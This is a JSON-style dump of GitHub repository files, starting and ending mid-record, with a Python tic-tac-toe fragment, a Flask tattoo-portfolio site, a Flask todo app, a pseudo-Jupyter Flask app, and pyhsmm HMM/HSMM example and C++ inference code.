tie\t\t\t\n\t\t\t\tif(full_board_check(the_board)):\n\t\t\t\t\tdisplay_board(the_board)\n\t\t\t\t\tprint('Tie Game\\n')\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\t#no tie and no win ? then next player's turn\n\t\t\t\t\tturn = 'Player 2'\t\t\t\t \n\t\telse:\n\t\t\t## Player Two turn\n\t\t\t\n\t\t\t#show the board\n\t\t\tdisplay_board(the_board)\n\t\t\t\n\t\t\t#choose a position\n\t\t\tpos = player_choice(the_board,turn)\n\t\t\t\n\t\t\t#place the marker on the position\n\t\t\tplace_marker(the_board,Player2marker,pos)\n\t\t\t\n\t\t\t#check if they won\n\t\t\tif win_check(the_board,Player2marker):\n\t\t\t\tdisplay_board(the_board)\n\t\t\t\tprint(turn + ' wins\\n')\n\t\t\t\tGameON = False\n\t\t\telse:\n\t\t\t\t#or check if there is a tie\t\t\t\n\t\t\t\tif(full_board_check(the_board)):\n\t\t\t\t\tdisplay_board(the_board)\n\t\t\t\t\tprint('Tie Game\\n')\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\t#no tie and no win ? then next player's turn\n\t\t\t\t\tturn = 'Player 1'\t\n\t\t\n\tif(not reply()):\n\t\tbreak\n\t\t\t\t\t\n\t\n\t\t\n\t\t\n\n\t" } ]
1
ikcilrep/tatoos
https://github.com/ikcilrep/tatoos
0e9935b0ca6f11206bb6792246e2d1a71bfb7ea9
bc5cbe10cefe98460d3deb0b2202cb8cbf7abae2
24c4ad54b511b92b4fcc3c10fc009333457cd269
refs/heads/master
2020-06-16T08:36:59.045452
2019-08-01T16:25:12
2019-08-01T16:25:12
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7424242496490479, "alphanum_fraction": 0.7424242496490479, "avg_line_length": 54, "blob_id": "819da7b1be5a748358a007895fcfd9be27c9edc2", "content_id": "c61477b9cdd81fe218128dd82489ebcd8bbaefab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 330, "license_type": "no_license", "max_line_length": 78, "num_lines": 6, "path": "/app/static/js/initializers.js", "repo_name": "ikcilrep/tatoos", "src_encoding": "UTF-8", "text": "document.addEventListener('DOMContentLoaded', function () {\n M.Carousel.init(document.querySelectorAll('.carousel'),{fullWidth: true});\n M.Sidenav.init(document.querySelectorAll('.sidenav'));\n M.Collapsible.init(document.querySelectorAll('.collapsible'));\n M.Parallax.init(document.querySelectorAll('.parallax'));\n});\n" }, { "alpha_fraction": 0.5493454337120056, "alphanum_fraction": 0.5528700947761536, "avg_line_length": 43.13333511352539, "blob_id": "182ba87226f81735b800d3099622d9bf8314d8eb", "content_id": "a837c3b8c308927595389fcf6773e4b3cd7daeb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1988, "license_type": "no_license", "max_line_length": 180, "num_lines": 45, "path": "/app/templates/base.html", "repo_name": "ikcilrep/tatoos", "src_encoding": "UTF-8", "text": "{% set sites = [(\"/\",\"Strona główna\", \"home\", 0), (\"portfolio\",\"Portfolio\", \"collections\", 1), (\"patterns\",\"Wzory\", \"store\", 2), (\"money\",\"Cennik\", \"account_balance_wallet\", 3)]%}\n\n<head>\n <meta name=viewport content=\"width=device-width, initial-scale=1\">\n <link href=\"https://fonts.googleapis.com/icon?family=Material+Icons\" rel=\"stylesheet\">\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/style.css') }}\">\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/materialize.min.css') }}\">\n</head>\n<title>{{sites[this_identifier][1]}}</title>\n\n<body>\n {% block navbar%}\n <nav>\n <div class=\"nav-wrapper z-depth-5\">\n <a href=\"#\" class=\"brand-logo right\"><i class=\"material-icons left\">brush</i>Handpoketatoos</a>\n <a href=\"#\" data-target=\"slide-out\" class=\"sidenav-trigger\"><i class=\"material-icons\">menu</i></a>\n <ul id=\"nav-mobile\" class=\"left hide-on-med-and-down\">\n {% for href, caption,icon, identifier in sites%}\n {% if this_identifier != identifier%}\n\n <li><a class=\"waves-effect waves-purple\" href={{href}}><i\n class=\"material-icons left\">{{icon}}</i>{{caption}}</a></li>\n {%endif%}\n {% endfor %}\n </ul>\n </div>\n </nav>\n {% endblock%}\n {%block sidenav%}\n <ul id=\"slide-out\" class=\"sidenav\">\n {% for href, caption,icon, identifier in sites%}\n {% if this_identifier != identifier%}\n <li><a class=\"waves-effect waves-purple\" href={{href}}><i\n class=\"material-icons left\">{{icon}}</i>{{caption}}</a></li> {%endif%}\n {% endfor %}\n </ul>\n {%endblock%}\n {% block content %}\n {% endblock %}\n\n {% block scripts%}\n <script src=\"{{ url_for('static', filename='js/materialize.min.js') }}\"></script>\n <script src=\"{{ url_for('static', filename='js/initializers.js') }}\"></script>\n {% endblock%}\n</body>\n" }, { "alpha_fraction": 0.527746319770813, "alphanum_fraction": 0.5628539323806763, "avg_line_length": 41.0476188659668, "blob_id": "b04934e809b874e41ef6e70e94f78cffb8719191", "content_id": "483d043a9b52f4506e67c8eda09088383af0c795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 892, "license_type": "no_license", "max_line_length": 119, "num_lines": 21, "path": "/app/templates/money.html", "repo_name": "ikcilrep/tatoos", "src_encoding": "UTF-8", "text": "{%extends 'base.html'%}\n\n{% block content%}\n<div class=\"container\">\n <div class=\"row\">\n <div class=\"col s12 z-depth-1\" style=\"padding-bottom:15px;\">\n <p class=\"flow-text\">Ceny tatuażów wahają między 60zł, a 200zł w zależności od poziomu skomplikowania wzoru\n i są\n do\n ustalenia.</p>\n <a class=\"waves-effect waves-light btn\" href=\"Tel: 660-629-345\"><i\n class=\"material-icons left\">local_phone</i>+48 660 629 345</a>\n <a class=\"waves-effect waves-light btn\" href=\"mailto: [email protected]\"><i\n class=\"material-icons left\">email</i>[email protected]</a>\n <a class=\"waves-effect waves-light btn\" href=\"https://www.facebook.com/natalia.perlicka.1\"><i\n class=\"material-icons left\">person</i>Facebook</a>\n\n </div>\n </div>\n</div>\n{%endblock%}\n" }, { "alpha_fraction": 0.7019608020782471, "alphanum_fraction": 0.7156862616539001, "avg_line_length": 27.33333396911621, "blob_id": "714da738ac1aeab4ea8420a450424ee326dcbaec", "content_id": "33cf0238ccb81e1afdc5631a44d6c15cfb984a52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 94, "num_lines": 18, "path": "/app/routes.py", "repo_name": "ikcilrep/tatoos", "src_encoding": "UTF-8", "text": "from app import app\nfrom flask import render_template\n\[email protected](\"/\")\ndef index():\n return render_template('main.html', this_identifier=0)\n\[email protected](\"/portfolio\")\ndef portfolio():\n return render_template('images.html', this_identifier=1, directory='portfolio', length=25)\n\[email protected](\"/patterns\")\ndef patterns():\n return render_template('images.html', this_identifier=2, directory='patterns', length=8)\n\[email protected](\"/money\")\ndef about():\n return render_template('money.html', this_identifier=3)\n" } ]
4
Tunahansrn/Todo-App
https://github.com/Tunahansrn/Todo-App
a1297b566823a690460c678b32e1c03e1dd4e63f
139847a6d54b7e80e50a40e40682818eec1d3e66
713bd0c00d58e9d47a9e374c33e900c512f9c415
refs/heads/main
2023-06-24T04:49:46.869692
2021-07-25T16:48:54
2021-07-25T16:48:54
389,155,991
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6437976360321045, "alphanum_fraction": 0.6451836228370667, "avg_line_length": 28.10416603088379, "blob_id": "09e4b8211fbd67fa9405b658657f07258fc2224e", "content_id": "e79f4c7ce0c2b17e5636709e072803bc298e5f65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1443, "license_type": "no_license", "max_line_length": 89, "num_lines": 48, "path": "/Todo-App/todo.py", "repo_name": "Tunahansrn/Todo-App", "src_encoding": "UTF-8", "text": "from functools import total_ordering\r\nfrom logging import debug\r\nfrom flask import Flask,render_template,redirect,url_for,request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom sqlalchemy.orm import query, session\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////Users/tunah/Desktop/Todo-App/todo.db'\r\ndb = SQLAlchemy(app)\r\n\r\nclass todo(db.Model):\r\n id = db.Column(db.Integer, primary_key = True)\r\n title = db.Column(db.String(64))\r\n complete = db.Column(db.Boolean)\r\n\r\[email protected](\"/\")\r\ndef index():\r\n nwtodo = todo.query.all()\r\n return render_template(\"index.html\",todos = nwtodo)\r\n\r\[email protected](\"/add\",methods=[\"POST\"])\r\ndef add():\r\n title = request.form.get(\"title\")\r\n if not title:\r\n return redirect(url_for(\"index\"))\r\n else:\r\n newtodo = todo(title=title,complete = False)\r\n db.session.add(newtodo)\r\n db.session.commit()\r\n return redirect(url_for(\"index\"))\r\n\r\[email protected](\"/complete/<string:id>\")\r\ndef complete(id):\r\n nwtodo = todo.query.filter_by(id = id).first()\r\n nwtodo.complete = not nwtodo.complete\r\n db.session.commit()\r\n return redirect(url_for(\"index\"))\r\n\r\[email protected](\"/delete/<string:id>\")\r\ndef delete(id):\r\n newtodo = todo.query.filter_by(id = id).first()\r\n db.session.delete(newtodo)\r\n db.session.commit()\r\n return redirect(url_for(\"index\"))\r\n\r\nif __name__ == \"__main__\":\r\n db.create_all()\r\n app.run(debug=True)" } ]
1
irina-goltsman/pseudo-jupyter
https://github.com/irina-goltsman/pseudo-jupyter
fd7a8859b9ed2dcdf5bdffba6afbca4594d01f8f
e9ffcef039555b5a6c4660b16336ecb78857cda9
ba32695f88652dd5b69ae0ef56ceb8154bbe20e6
refs/heads/master
2020-05-05T11:11:40.064316
2019-04-07T18:45:43
2019-04-07T18:45:43
179,979,249
0
0
null
2019-04-07T14:40:46
2019-04-06T19:25:10
2019-04-06T19:25:08
null
[ { "alpha_fraction": 0.698630154132843, "alphanum_fraction": 0.7031963467597961, "avg_line_length": 20.899999618530273, "blob_id": "c3dfcb81e8f6d9ba1770cb640998b684a116effa", "content_id": "9cf8813ffb49569adfd6075fc480af3bc4373bbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 50, "num_lines": 10, "path": "/app/__init__.py", "repo_name": "irina-goltsman/pseudo-jupyter", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport flask\nimport logging\n\napp = flask.Flask(__name__)\napp.config['SECRET_KEY'] = 'dskjgdskfjghdskjfhdfg'\n\n# create logger instance\nlogger = logging.getLogger(__name__)\nlogger.setLevel('INFO')\n" }, { "alpha_fraction": 0.6270963549613953, "alphanum_fraction": 0.6307135820388794, "avg_line_length": 28.52427101135254, "blob_id": "f168c72a1770f77497b35cd59e2fb4bfaed4bb8a", "content_id": "3de89331bd6186b0ce420fdcfa7355d9b81c7ea9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3041, "license_type": "no_license", "max_line_length": 75, "num_lines": 103, "path": "/app/views.py", "repo_name": "irina-goltsman/pseudo-jupyter", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport os\nimport flask\n\nfrom app import ipynb\nfrom app import app, logger\n\n# global variables to store the current state of our notebook\nINPUTS = ['print(\"Type your code snippet here\")']\nOUTPUTS = ['']\nEXECUTE_COUNTERS = [0]\nCURRENT_EXECUTE_COUNT = 0\n\n\[email protected]('/favicon.ico')\ndef favicon():\n \"\"\"Handles browser's request for favicon\"\"\"\n return flask.send_from_directory(\n os.path.join(app.root_path, 'static'),\n 'favicon.ico'\n )\n\n\[email protected]('/', methods=['GET'])\ndef get():\n \"\"\"This triggers when you first open the site with your browser\"\"\"\n assert len(INPUTS) == len(OUTPUTS)\n return ipynb.render_notebook(INPUTS, OUTPUTS, EXECUTE_COUNTERS)\n\n\[email protected]('/execute_cell/<cell_id>', methods=['POST'])\ndef execute(cell_id=None):\n \"\"\"Gets piece of code from cell_id and executes it\"\"\"\n try:\n cell_id = int(cell_id)\n except ValueError as e:\n logger.warning(e)\n return flask.redirect('/')\n\n global CURRENT_EXECUTE_COUNT\n try:\n CURRENT_EXECUTE_COUNT += 1\n EXECUTE_COUNTERS[cell_id] = CURRENT_EXECUTE_COUNT\n\n INPUTS[cell_id] = flask.request.form['input{}'.format(cell_id)]\n result = ipynb.execute_snippet(INPUTS[cell_id], globals())\n except Exception as e:\n # anything could happen inside, even `exit()` call\n result = str(e)\n\n OUTPUTS[cell_id] = result\n return flask.redirect('/')\n\n\[email protected]('/add_cell', methods=['POST'])\ndef add_cell():\n \"\"\"Appends empty cell data to the end\"\"\"\n INPUTS.append('')\n OUTPUTS.append('')\n EXECUTE_COUNTERS.append(0)\n return flask.redirect('/')\n\n\[email protected]('/remove_cell/<cell_id>', methods=['POST'])\ndef remove_cell(cell_id=0):\n \"\"\"Removes a cell by number\"\"\"\n try:\n cell_id = int(cell_id)\n if len(INPUTS) < 2:\n raise ValueError('Cannot remove the last cell')\n if cell_id < 0 or cell_id >= len(INPUTS):\n raise ValueError('Bad cell id')\n except ValueError as e:\n # do not change internal info\n logger.warning(e)\n return flask.redirect('/')\n\n # remove related data\n INPUTS.pop(cell_id)\n OUTPUTS.pop(cell_id)\n EXECUTE_COUNTERS.pop(cell_id)\n return flask.redirect('/')\n\n\[email protected]('/ipynb', methods=['GET', 'POST'])\ndef ipynb_handler():\n \"\"\"\n Imports/exports notebook data in .ipynb format (a.k.a Jupyter Notebook)\n Docs: https://nbformat.readthedocs.io/en/latest/format_description.html\n \"\"\"\n global INPUTS, OUTPUTS\n if flask.request.method == 'GET':\n # return json representation of the notebook here\n return ipynb.export(INPUTS, OUTPUTS)\n elif flask.request.method == 'POST':\n # update internal data\n imported = ipynb.import_from_json(flask.request.get_json())\n # we can return None if json is not a valid ipynb\n if imported:\n INPUTS, OUTPUTS = imported\n # common practice for POST/PUT is returning empty json\n # when everything is 200 OK\n return flask.jsonify({})\n" } ]
2
RyoOzaki/pyhsmm
https://github.com/RyoOzaki/pyhsmm
f648c8b0ef5e05889f08ae0902a8daa4f17057b2
4cb540f985881dab04aa8e2991318ffbc9d2b035
d35c492b68fdf72c4add2e707ad454e5ddff31d2
refs/heads/master
2021-07-11T05:23:45.019680
2020-11-26T11:36:40
2020-11-26T11:36:40
218,244,377
0
1
MIT
2019-10-29T08:59:14
2019-10-29T01:06:10
2019-07-31T17:11:32
null
[ { "alpha_fraction": 0.6650359034538269, "alphanum_fraction": 0.6819961071014404, "avg_line_length": 32.315216064453125, "blob_id": "e71165a9a80d30e897872d16bef5d5ce2da94aab", "content_id": "6ed561c22c9cdd01343031d1e1d7cdfa425d88bd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3066, "license_type": "permissive", "max_line_length": 88, "num_lines": 92, "path": "/examples/hmm.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "from __future__ import division\nfrom builtins import range\nimport numpy as np\nnp.seterr(divide='ignore') # these warnings are usually harmless for this code\nnp.random.seed(0)\n\nfrom matplotlib import pyplot as plt\nimport matplotlib\nimport os\nmatplotlib.rcParams['font.size'] = 8\n\nimport pyhsmm\nfrom pyhsmm.util.text import progprint_xrange\n\nprint('''\nThis demo shows how HDP-HMMs can fail when the underlying data has state\npersistence without some kind of temporal regularization (in the form of a\nsticky bias or duration modeling): without setting the number of states to be\nthe correct number a priori, lots of extra states can be intsantiated.\n\nBUT the effect is much more relevant on real data (when the data doesn't exactly\nfit the model). Maybe this demo should use multinomial emissions...\n''')\n###############\n# load data #\n###############\n\ndata = np.loadtxt(os.path.join(os.path.dirname(__file__),'example-data.txt'))[:2500]\nT = data.shape[0]\n\n#########################\n# posterior inference #\n#########################\n\n# Set the weak limit truncation level\nNmax = 25\n\n# and some hyperparameters\nobs_dim = data.shape[1]\nobs_hypparams = {'mu_0':np.zeros(obs_dim),\n 'sigma_0':np.eye(obs_dim),\n 'kappa_0':0.25,\n 'nu_0':obs_dim+2}\n\n### HDP-HMM without the sticky bias\nobs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]\nposteriormodel = pyhsmm.models.WeakLimitHDPHMM(alpha=6.,gamma=6.,\n init_state_concentration=1.,\n obs_distns=obs_distns)\nposteriormodel.add_data(data)\n\nfor idx in progprint_xrange(100):\n posteriormodel.resample_model()\n\nposteriormodel.plot()\nplt.gcf().suptitle('HDP-HMM sampled model after 100 iterations')\n\n### HDP-HMM with \"sticky\" initialization\nobs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]\nposteriormodel = pyhsmm.models.WeakLimitHDPHMM(alpha=6.,gamma=6.,\n init_state_concentration=1.,\n obs_distns=obs_distns)\n\n# Start with a \"sticky\" state sequence\nz_init = np.random.randint(0, Nmax, size=(T//5)).repeat(5)\nposteriormodel.add_data(data, stateseq=z_init)\n\n# Initialize the parameters of the model, holding the stateseq fixed\nfor _ in progprint_xrange(10):\n posteriormodel.resample_parameters()\n\nfor idx in progprint_xrange(100):\n posteriormodel.resample_model()\n\nposteriormodel.plot()\nplt.gcf().suptitle('HDP-HMM (sticky initialization) sampled model after 100 iterations')\n\n### Sticky-HDP-HMM\n\nobs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]\nposteriormodel = pyhsmm.models.WeakLimitStickyHDPHMM(\n kappa=50.,alpha=6.,gamma=6.,init_state_concentration=1.,\n obs_distns=obs_distns)\nposteriormodel.add_data(data)\n\nfor idx in progprint_xrange(100):\n posteriormodel.resample_model()\n\nposteriormodel.plot()\nplt.gcf().suptitle('Sticky HDP-HMM sampled model after 100 iterations')\n\nplt.show()\n\n" }, { "alpha_fraction": 0.8101266026496887, "alphanum_fraction": 0.8101266026496887, "avg_line_length": 25.33333396911621, "blob_id": "d92b8e4587ecafb5aa2c9ec057f8e08242c647bb", "content_id": "6e2a55104868129cf12e2a1024455fcabd0a0356", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "permissive", "max_line_length": 61, "num_lines": 6, "path": "/pyhsmm/__init__.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "# __all__ = something\nimport pyhsmm\nimport pyhsmm.models\nimport pyhsmm.basic\nimport pyhsmm.basic.distributions as distributions # shortcut\nimport pyhsmm.util\n" }, { "alpha_fraction": 0.6669965386390686, "alphanum_fraction": 0.6679861545562744, "avg_line_length": 23.047618865966797, "blob_id": "2e4628bf19ff9c74f913786d0be1fafafcc3183d", "content_id": "fb22529d75e0aa407bccd89d1f59097a0a8c4706", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2021, "license_type": "permissive", "max_line_length": 91, "num_lines": 84, "path": "/pyhsmm/basic/models.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "# These classes make aliases of class members and properties so as to make\n# pybasicbayes mixture models look more like pyhsmm models. When comparing\n# H(S)MM model fits to pybasicbayes mixture model fits, it's easier to write one\n# code path by using these models.\n\nfrom copy import deepcopy\n\nimport pybasicbayes\nfrom pyhsmm.util.general import rle\n\n\nclass _Labels(pybasicbayes.models.Labels):\n @property\n def T(self):\n return self.N\n\n @property\n def stateseq(self):\n return self.z\n\n @stateseq.setter\n def stateseq(self,stateseq):\n self.z = stateseq\n\n @property\n def stateseqs_norep(self):\n return rle(self.z)[0]\n\n @property\n def durations(self):\n return rle(self.z)[1]\n\n\nclass _MixturePropertiesMixin(object):\n _labels_class = _Labels\n\n @property\n def num_states(self):\n return len(self.obs_distns)\n\n @property\n def states_list(self):\n return self.labels_list\n\n @property\n def stateseqs(self):\n return [s.stateseq for s in self.states_list]\n\n @property\n def stateseqs_norep(self):\n return [s.stateseq_norep for s in self.states_list]\n\n @property\n def durations(self):\n return [s.durations for s in self.states_list]\n\n @property\n def obs_distns(self):\n return self.components\n\n @obs_distns.setter\n def obs_distns(self,distns):\n self.components = distns\n\n def predict(self,seed_data,timesteps,**kwargs):\n # NOTE: seed_data doesn't matter!\n return self.generate(timesteps,keep=False)\n\n @classmethod\n def from_pbb_mixture(cls,mixture):\n self = cls(\n weights_obj=deepcopy(mixture.weights),\n components=deepcopy(mixture.components))\n for l in mixture.labels_list:\n self.add_data(l.data,z=l.z)\n return self\n\n\nclass Mixture(_MixturePropertiesMixin,pybasicbayes.models.Mixture):\n pass\n\n\nclass MixtureDistribution(_MixturePropertiesMixin,pybasicbayes.models.MixtureDistribution):\n pass\n\n" }, { "alpha_fraction": 0.8026315569877625, "alphanum_fraction": 0.8026315569877625, "avg_line_length": 24.33333396911621, "blob_id": "70561b9755358423fa497f1dcb8e15cc46edcc14", "content_id": "bc4f9b7a5129e896dcb8e796b46a2d4c917c061f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 76, "license_type": "permissive", "max_line_length": 27, "num_lines": 3, "path": "/pyhsmm/basic/__init__.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "from . import models\nfrom . import distributions\nfrom . import abstractions\n" }, { "alpha_fraction": 0.6142857074737549, "alphanum_fraction": 0.6458333134651184, "avg_line_length": 29, "blob_id": "0e3617de122203cb87b97412da476f3e3c8436e8", "content_id": "bd25871af1ee81938c78beb9a25c107a9cab5bdc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1680, "license_type": "permissive", "max_line_length": 101, "num_lines": 56, "path": "/examples/concentration-resampling.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "from __future__ import division\nimport numpy as np\nnp.seterr(divide='ignore') # these warnings are usually harmless for this code\nfrom matplotlib import pyplot as plt\nimport os\nimport scipy.stats as stats\n\nimport pyhsmm\nfrom pyhsmm.util.text import progprint_xrange\n\n###############\n# load data #\n###############\n\nT = 1000\ndata = np.loadtxt(os.path.join(os.path.dirname(__file__),'example-data.txt'))[:T]\n\n#########################\n# posterior inference #\n#########################\n\nNmax = 20\nobs_dim = data.shape[1]\nobs_hypparams = {'mu_0':np.zeros(obs_dim),\n 'sigma_0':np.eye(obs_dim),\n 'kappa_0':0.25,\n 'nu_0':obs_dim+2}\ndur_hypparams = {'alpha_0':2*30,\n 'beta_0':2}\n\nobs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]\ndur_distns = [pyhsmm.distributions.PoissonDuration(**dur_hypparams) for state in range(Nmax)]\n\nposteriormodel = pyhsmm.models.WeakLimitHDPHSMM(\n # NOTE: instead of passing in alpha_0 and gamma_0, we pass in parameters\n # for priors over those concentration parameters\n alpha_a_0=1.,alpha_b_0=1./4,\n gamma_a_0=1.,gamma_b_0=1./4,\n init_state_concentration=6.,\n obs_distns=obs_distns,\n dur_distns=dur_distns)\nposteriormodel.add_data(data,trunc=70)\n\nfor idx in progprint_xrange(100):\n posteriormodel.resample_model()\n\nplt.figure()\nposteriormodel.plot()\nplt.gcf().suptitle('Sampled after 100 iterations')\n\nplt.figure()\nt = np.linspace(0.01,30,1000)\nplt.plot(t,stats.gamma.pdf(t,1.,scale=4.)) # NOTE: numpy/scipy scale is inverted compared to my scale\nplt.title('Prior on concentration parameters')\n\nplt.show()\n" }, { "alpha_fraction": 0.5487164855003357, "alphanum_fraction": 0.5570840835571289, "avg_line_length": 35.5336799621582, "blob_id": "c80361d8dd0a836322ead23b4e38f3de590b7492", "content_id": "19e79b1c766866f3af4691620c0dc38364812621", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7051, "license_type": "permissive", "max_line_length": 95, "num_lines": 193, "path": "/pyhsmm/internals/hsmm_messages.h", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "#ifndef HSMM_H\n#define HSMM_H\n\n#include <Eigen/Core>\n#include <iostream> // cout, endl\n#include <algorithm> // min\n\n#include \"util.h\"\n#include \"nptypes.h\"\n\nnamespace hsmm\n{\n using namespace std;\n using namespace Eigen;\n using namespace nptypes;\n\n template <typename Type>\n void messages_backwards_log(\n int M, int T, Type *A, Type *aBl, Type *aDl, Type *aDsl,\n Type *betal, Type *betastarl, int right_censoring, int trunc)\n {\n NPMatrix<Type> eA(A,M,M);\n NPArray<Type> eaBl(aBl,T,M);\n NPArray<Type> eaDl(aDl,T,M);\n NPArray<Type> eaDsl(aDsl,T,M);\n\n NPArray<Type> ebetal(betal,T,M);\n NPArray<Type> ebetastarl(betastarl,T,M);\n\n#ifdef HMM_TEMPS_ON_HEAP\n Array<Type,1,Dynamic> sumsofar(M);\n Array<Type,1,Dynamic> result(M);\n Array<Type,1,Dynamic> maxes(M);\n#else\n Type sumsofar_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> sumsofar(sumsofar_buf,M);\n Type result_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> result(result_buf,M);\n Type maxes_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> maxes(maxes_buf,M);\n#endif\n\n Type cmax;\n ebetal.row(T-1).setZero();\n for(int t=T-1; t>=0; t--) {\n sumsofar.setZero();\n ebetastarl.row(t).setConstant(-1.0*numeric_limits<Type>::infinity());\n for(int tau=0; tau < min(trunc,T-t); tau++) {\n sumsofar += eaBl.row(t+tau);\n result = ebetal.row(t+tau) + sumsofar + eaDl.row(tau);\n maxes = ebetastarl.row(t).cwiseMax(result);\n ebetastarl.row(t) =\n ((ebetastarl.row(t) - maxes).exp() + (result - maxes).exp()).log() + maxes;\n }\n if (right_censoring && T-t-1 < trunc) {\n result = eaBl.block(t,0,T-t,M).colwise().sum() + eaDsl.row(T-1-t);\n maxes = ebetastarl.row(t).cwiseMax(result);\n ebetastarl.row(t) =\n ((ebetastarl.row(t) - maxes).exp() + (result - maxes).exp()).log() + maxes;\n }\n for(int i=0; i<M; i++) {\n if (ebetastarl(t,i) != ebetastarl(t,i)) {\n ebetastarl(t,i) = -1.0*numeric_limits<Type>::infinity();\n }\n }\n if (likely(t > 0)) {\n cmax = ebetastarl.row(t).maxCoeff();\n ebetal.row(t-1) = (eA * (ebetastarl.row(t) - cmax).exp().matrix().transpose()\n ).array().log() + cmax;\n for(int i=0; i<M; i++) {\n if (ebetal(t-1,i) != ebetal(t-1,i)) {\n ebetal(t-1,i) = -1.0*numeric_limits<Type>::infinity();\n }\n }\n }\n }\n }\n\n template <typename Type>\n void messages_forwards_log(\n int M, int T, Type *A, Type *aBl, Type *aDl, Type *aDsl, Type *pil,\n Type *alphal, Type *alphastarl)\n {\n // TODO trunc, censoring\n\n NPMatrix<Type> eA(A,M,M);\n NPArray<Type> eaBl(aBl,T,M);\n NPArray<Type> eaDl(aDl,T,M);\n NPArray<Type> eaDsl(aDsl,T,M);\n NPRowVectorArray<Type> epil(pil,M);\n\n NPArray<Type> ealphal(alphal,T,M);\n NPArray<Type> ealphastarl(alphastarl,T,M);\n\n#ifdef HMM_TEMPS_ON_HEAP\n Array<Type,1,Dynamic> sumsofar(M);\n Array<Type,1,Dynamic> result(M);\n Array<Type,1,Dynamic> maxes(M);\n#else\n Type sumsofar_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> sumsofar(sumsofar_buf,M);\n Type result_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> result(result_buf,M);\n Type maxes_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> maxes(maxes_buf,M);\n#endif\n\n // TODO\n\n }\n\n template <typename FloatType, typename IntType>\n void sample_forwards_log(\n int M, int T, FloatType *A, FloatType *pi0, FloatType *caBl, FloatType *aDl,\n FloatType *betal, FloatType *betastarl, IntType *stateseq, FloatType *randseq)\n {\n NPArray<FloatType> eA(A,M,M);\n NPArray<FloatType> ecaBl(caBl,T+1,M);\n NPArray<FloatType> eaDl(aDl,T,M);\n NPArray<FloatType> ebetal(betal,T,M);\n NPArray<FloatType> ebetastarl(betastarl,T,M);\n NPVectorArray<IntType> estateseq(stateseq,T);\n\n#ifdef HMM_TEMPS_ON_HEAP\n Array<FloatType,1,Dynamic> logdomain(M);\n Array<FloatType,1,Dynamic> nextstate_distr(M);\n#else\n FloatType logdomain_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<FloatType> logdomain(logdomain_buf,M);\n FloatType nextstate_distr_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<FloatType> nextstate_distr(nextstate_distr_buf,M);\n#endif\n\n int t = 0, dur, randseq_idx=0;\n IntType state;\n FloatType durprob, p_d_prior, p_d;\n\n nextstate_distr = NPRowVectorArray<FloatType>(pi0,M);\n while (t < T) {\n // use the messages to form the posterior over states\n logdomain = ebetastarl.row(t) - ebetastarl.row(t).maxCoeff();\n nextstate_distr *= logdomain.exp();\n if ((nextstate_distr == 0.).all()) {\n cout << \"Warning: all-zero posterior state belief, following likelihood\"\n << endl;\n nextstate_distr = logdomain.exp();\n }\n\n // sample from nextstate_distr\n state = util::sample_discrete(M,nextstate_distr.data(),randseq[randseq_idx++]);\n\n // sample from duration pmf\n durprob = randseq[randseq_idx++];\n for(dur=0; durprob > 0. && t+dur < T; dur++) {\n p_d_prior = exp(eaDl(dur,state));\n if (0.0 == p_d_prior) {\n continue;\n }\n p_d = p_d_prior * exp(ecaBl(t+dur+1,state) - ecaBl(t,state)\n + ebetal(t+dur,state) - ebetastarl(t,state));\n durprob -= p_d;\n }\n // NOTE: if t+dur == T, the duration is censored; it will be fixed up in Python\n\n // set the output\n estateseq.segment(t,dur).setConstant(state);\n t += dur;\n nextstate_distr = eA.row(state);\n }\n }\n}\n\n// NOTE: this class exists for 